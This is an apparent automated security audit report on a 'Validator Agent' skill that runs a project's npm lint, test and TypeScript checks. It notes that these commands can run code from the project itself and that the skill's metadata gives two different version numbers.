Validator Agent
PassAudited by ClawScan on May 1, 2026.
Overview
This skill is a coherent pre-deployment validator, but it needs to run local project commands, so use it only on repositories and dependencies you trust.
This appears safe for its stated purpose as an instruction-only validation skill. Before installing or invoking it, be aware that it runs your project’s local build, lint, test, audit, and npx tooling; only use it on repositories you trust, and review scripts/dependencies for unfamiliar projects.
Findings (3)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
Running the validator may execute code from the repository and its dependencies, even though the skill itself does not include code.
The skill instructs the agent to run local npm commands in the selected project. This is expected for validation, but npm scripts can execute project-controlled code.
cd <project> && npm run lint 2>&1 | tail -20 ... cd <project> && npm test 2>&1
Use it on trusted projects, review package scripts before running, and avoid pointing it at untrusted repositories.
A validation run can execute package tooling in the local environment, which may have side effects if the project or package source is untrusted.
The documented validation flow uses npx-based tooling. That is normal for TypeScript validation, but npx/npm tooling may execute locally installed or fetched package code depending on the environment.
cd <project> && npx tsc --noEmit 2>&1 ... cd <project> && npx type-coverage 2>&1 || echo "type-coverage not installed — skip"
Prefer projects with pinned dependencies and installed, reviewed tooling; run in a controlled workspace when validating unfamiliar code.
Users may be unsure which version of the skill metadata they are reviewing or installing.
The registry metadata reports version 1.1.0, while the included skill.json reports version 1.0.0. This is a minor provenance/coherence mismatch rather than evidence of harmful behavior.
"version": "1.0.0"
Verify the published package/version details if version provenance matters for your workflow.